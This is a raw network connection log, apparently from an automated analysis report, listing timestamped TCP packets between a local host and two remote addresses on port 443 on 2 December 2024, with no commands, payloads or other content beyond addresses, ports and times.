Dec 2, 2024 18:41:22.961457014 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:23.633375883 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:23.633399963 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:24.183824062 CET	49929	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:24.183854103 CET	443	49929	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:24.183933973 CET	49929	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:24.184184074 CET	49929	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:24.184201002 CET	443	49929	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:25.968635082 CET	443	49929	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:25.971165895 CET	49929	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:25.971652985 CET	49929	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:25.971661091 CET	443	49929	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:25.971895933 CET	49929	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:25.971901894 CET	443	49929	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:26.695425034 CET	443	49929	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:26.695497990 CET	49929	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:26.695518017 CET	443	49929	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:26.695530891 CET	443	49929	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:26.695565939 CET	49929	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:26.695584059 CET	49929	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:26.698291063 CET	49929	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:26.698306084 CET	443	49929	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:26.779331923 CET	49934	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:26.779362917 CET	443	49934	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:26.779433966 CET	49934	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:26.779723883 CET	49934	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:26.779733896 CET	443	49934	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:28.050924063 CET	443	49934	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:28.050992966 CET	49934	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:28.051475048 CET	49934	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:28.051481009 CET	443	49934	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:28.051697969 CET	49934	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:28.051702976 CET	443	49934	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:28.838443041 CET	443	49934	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:28.838551998 CET	443	49934	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:28.838577986 CET	49934	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:28.838608027 CET	49934	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:28.842375040 CET	49934	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:28.842415094 CET	443	49934	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:29.029890060 CET	49940	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:29.029907942 CET	443	49940	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:29.030035973 CET	49940	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:29.030328989 CET	49940	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:29.030342102 CET	443	49940	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:30.336787939 CET	443	49940	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:30.336857080 CET	49940	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:30.337399960 CET	49940	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:30.337409973 CET	443	49940	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:30.337656975 CET	49940	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:30.337662935 CET	443	49940	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:31.154823065 CET	443	49940	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:31.155019999 CET	443	49940	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:31.155230999 CET	49940	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:31.159581900 CET	49940	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:31.159599066 CET	443	49940	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:31.283334970 CET	49946	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:31.283380032 CET	443	49946	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:31.287473917 CET	49946	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:31.291342020 CET	49946	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:31.291356087 CET	443	49946	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:32.576098919 CET	443	49946	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:32.576157093 CET	49946	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:32.576607943 CET	49946	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:32.576620102 CET	443	49946	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:32.576773882 CET	49946	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:32.576780081 CET	443	49946	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:33.284137011 CET	443	49946	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:33.284252882 CET	443	49946	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:33.287498951 CET	49946	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:33.323929071 CET	49946	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:33.323952913 CET	443	49946	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:33.693345070 CET	49953	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:33.693401098 CET	443	49953	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:33.694324017 CET	49953	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:33.694616079 CET	49953	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:33.694626093 CET	443	49953	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:34.956702948 CET	443	49953	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:34.956798077 CET	49953	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:34.957324028 CET	49953	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:34.957334995 CET	443	49953	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:34.957787037 CET	49953	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:34.957792997 CET	443	49953	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:35.701613903 CET	443	49953	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:35.701716900 CET	443	49953	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:35.701798916 CET	49953	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:35.701875925 CET	49953	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:35.707360983 CET	49953	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:35.707385063 CET	443	49953	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:35.727360964 CET	49956	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:35.727401018 CET	443	49956	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:35.727474928 CET	49956	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:35.727771997 CET	49956	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:35.727785110 CET	443	49956	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:37.058907032 CET	443	49956	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:37.058990955 CET	49956	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:37.059515953 CET	49956	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:37.059524059 CET	443	49956	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:37.059799910 CET	49956	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:37.059799910 CET	49956	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:37.059813976 CET	443	49956	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:37.059828997 CET	443	49956	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:37.887461901 CET	443	49956	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:37.887528896 CET	49956	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:37.887552023 CET	443	49956	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:37.887598991 CET	49956	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:37.887605906 CET	443	49956	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:37.887617111 CET	443	49956	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:37.887655973 CET	49956	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:37.887974977 CET	49956	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:37.887986898 CET	443	49956	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:37.982579947 CET	49962	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:37.982613087 CET	443	49962	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:37.982667923 CET	49962	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:37.982959032 CET	49962	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:37.982971907 CET	443	49962	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:39.300038099 CET	443	49962	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:39.300163031 CET	49962	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:39.300755978 CET	49962	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:39.300755978 CET	49962	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:39.300765991 CET	443	49962	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:39.300782919 CET	443	49962	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:39.585359097 CET	49962	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:39.884931087 CET	49967	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:39.884958029 CET	443	49967	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:39.885010958 CET	49967	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:39.885601044 CET	49967	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:39.885615110 CET	443	49967	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:41.150717020 CET	443	49967	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:41.150830984 CET	49967	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:41.165338039 CET	49967	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:41.165338039 CET	49967	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:41.165354013 CET	443	49967	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:41.165363073 CET	443	49967	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:41.165649891 CET	443	49967	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:41.165909052 CET	49967	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:42.730994940 CET	443	49967	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:42.731050968 CET	49967	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:42.731069088 CET	443	49967	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:42.731106997 CET	49967	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:42.731112003 CET	443	49967	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:42.731137037 CET	443	49967	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:42.731153011 CET	49967	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:42.731177092 CET	49967	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:42.731508970 CET	49967	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:42.731518984 CET	443	49967	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:42.793370962 CET	49974	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:42.793392897 CET	443	49974	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:42.797473907 CET	49974	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:42.801372051 CET	49974	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:42.801384926 CET	443	49974	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:44.143038988 CET	443	49974	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:44.143135071 CET	49974	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:44.209158897 CET	49974	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:44.209165096 CET	443	49974	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:44.269251108 CET	49974	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:44.269258022 CET	443	49974	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:45.759552002 CET	443	49974	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:45.759619951 CET	49974	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:45.759629965 CET	443	49974	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:45.759650946 CET	443	49974	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:45.759670973 CET	49974	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:45.759692907 CET	49974	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:45.759903908 CET	49974	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:45.759912014 CET	443	49974	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:45.851525068 CET	49982	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:45.851547956 CET	443	49982	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:45.851973057 CET	49982	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:45.852229118 CET	49982	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:45.852237940 CET	443	49982	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:47.125101089 CET	443	49982	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:47.125173092 CET	49982	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:47.127759933 CET	49982	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:47.127770901 CET	443	49982	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:47.139168024 CET	49982	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:47.139173985 CET	443	49982	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:48.715604067 CET	443	49982	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:48.715665102 CET	49982	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:48.715687990 CET	443	49982	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:48.715708017 CET	443	49982	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:48.715735912 CET	49982	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:48.715751886 CET	49982	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:48.715965986 CET	49982	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:48.715976000 CET	443	49982	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:48.791385889 CET	49988	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:48.791436911 CET	443	49988	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:48.795581102 CET	49988	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:48.799384117 CET	49988	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:48.799401999 CET	443	49988	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:50.110223055 CET	443	49988	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:50.110280037 CET	49988	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:50.111346006 CET	49988	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:50.111356020 CET	443	49988	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:50.114350080 CET	49988	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:50.114356041 CET	443	49988	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:51.735809088 CET	443	49988	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:51.735917091 CET	443	49988	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:51.737833977 CET	49988	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:51.737833977 CET	49988	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:51.822439909 CET	49997	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:51.822468996 CET	443	49997	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:51.822530031 CET	49997	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:51.822989941 CET	49997	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:51.823004961 CET	443	49997	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:52.162420988 CET	49988	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:52.162456989 CET	443	49988	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:53.449497938 CET	443	49997	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:53.449930906 CET	49997	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:53.449930906 CET	49997	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:53.449958086 CET	443	49997	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:53.453444004 CET	49997	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:53.453450918 CET	443	49997	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:55.211091995 CET	443	49997	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:55.211165905 CET	49997	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:55.211191893 CET	443	49997	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:55.211208105 CET	443	49997	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:55.211358070 CET	49997	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:55.211544037 CET	49997	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:55.211556911 CET	443	49997	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:55.293036938 CET	50005	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:55.293085098 CET	443	50005	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:55.293272018 CET	50005	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:55.294054985 CET	50005	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:55.294070959 CET	443	50005	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:56.555027962 CET	443	50005	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:56.555094957 CET	50005	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:56.555404902 CET	50005	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:56.555413961 CET	443	50005	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:56.556529999 CET	50005	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:56.556535006 CET	443	50005	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:58.162800074 CET	443	50005	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:58.162856102 CET	50005	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:58.162864923 CET	443	50005	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:58.162904978 CET	50005	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:58.162909985 CET	443	50005	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:58.162944078 CET	50005	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:58.163253069 CET	50005	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:58.163269043 CET	443	50005	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:58.242360115 CET	50013	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:58.242397070 CET	443	50013	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:58.242508888 CET	50013	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:58.242716074 CET	50013	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:58.242732048 CET	443	50013	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:59.484605074 CET	443	50013	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:59.485708952 CET	50013	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:59.489542007 CET	50013	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:59.489554882 CET	443	50013	104.21.68.89	192.168.2.4
Dec 2, 2024 18:41:59.497749090 CET	50013	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:41:59.497756004 CET	443	50013	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:01.088835001 CET	443	50013	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:01.088916063 CET	50013	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:01.088922024 CET	443	50013	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:01.089071989 CET	50013	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:01.089234114 CET	50013	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:01.089250088 CET	443	50013	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:01.143409014 CET	50020	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:01.143459082 CET	443	50020	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:01.143539906 CET	50020	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:01.143835068 CET	50020	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:01.143851042 CET	443	50020	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:02.448641062 CET	443	50020	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:02.448684931 CET	50020	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:02.449249983 CET	50020	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:02.449259996 CET	443	50020	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:02.450752974 CET	50020	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:02.450757980 CET	443	50020	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:04.060882092 CET	443	50020	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:04.060940027 CET	50020	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:04.060971022 CET	443	50020	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:04.060995102 CET	443	50020	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:04.061014891 CET	50020	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:04.061048985 CET	50020	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:04.061352968 CET	50020	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:04.061369896 CET	443	50020	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:04.155268908 CET	50027	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:04.155323982 CET	443	50027	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:04.155375957 CET	50027	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:04.155648947 CET	50027	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:04.155667067 CET	443	50027	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:05.415092945 CET	443	50027	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:05.415410995 CET	50027	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:05.415796995 CET	50027	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:05.415806055 CET	443	50027	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:05.419425964 CET	50027	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:05.419435024 CET	443	50027	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:06.835915089 CET	443	50027	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:06.836034060 CET	443	50027	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:06.837902069 CET	50027	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:06.837902069 CET	50027	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:06.981542110 CET	50032	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:06.981602907 CET	443	50032	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:06.985820055 CET	50032	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:06.985821009 CET	50032	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:06.985904932 CET	443	50032	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:07.179439068 CET	50027	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:07.179482937 CET	443	50027	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:08.224062920 CET	443	50032	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:08.224133015 CET	50032	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:08.224359035 CET	50032	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:08.224369049 CET	443	50032	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:08.225699902 CET	50032	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:08.225706100 CET	443	50032	104.21.68.89	192.168.2.4
Dec 2, 2024 18:42:09.555444956 CET	50032	443	192.168.2.4	104.21.68.89
Dec 2, 2024 18:42:09.556952000 CET	50033	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:09.556998968 CET	443	50033	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:09.557301044 CET	50033	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:09.559433937 CET	50033	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:09.559444904 CET	443	50033	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:10.849859953 CET	443	50033	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:10.849972963 CET	50033	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:10.850428104 CET	50033	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:10.850441933 CET	443	50033	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:10.850682020 CET	50033	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:10.850692034 CET	443	50033	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:11.540895939 CET	443	50033	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:11.540987968 CET	50033	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:11.540998936 CET	443	50033	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:11.541012049 CET	443	50033	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:11.541069984 CET	50033	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:11.541234016 CET	50033	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:11.541258097 CET	443	50033	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:11.547426939 CET	50034	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:11.547478914 CET	443	50034	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:11.547679901 CET	50034	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:11.547833920 CET	50034	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:11.547849894 CET	443	50034	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:12.761457920 CET	443	50034	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:12.761517048 CET	50034	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:12.761972904 CET	50034	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:12.761982918 CET	443	50034	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:12.762214899 CET	50034	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:12.762219906 CET	443	50034	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:13.494503021 CET	443	50034	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:13.494606972 CET	443	50034	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:13.494729042 CET	50034	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:13.494951010 CET	50034	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:13.494973898 CET	443	50034	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:13.559571981 CET	50035	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:13.559603930 CET	443	50035	104.21.16.251	192.168.2.4
Dec 2, 2024 18:42:13.559739113 CET	50035	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:42:13.560046911 CET	50035	443	192.168.2.4	104.21.16.251
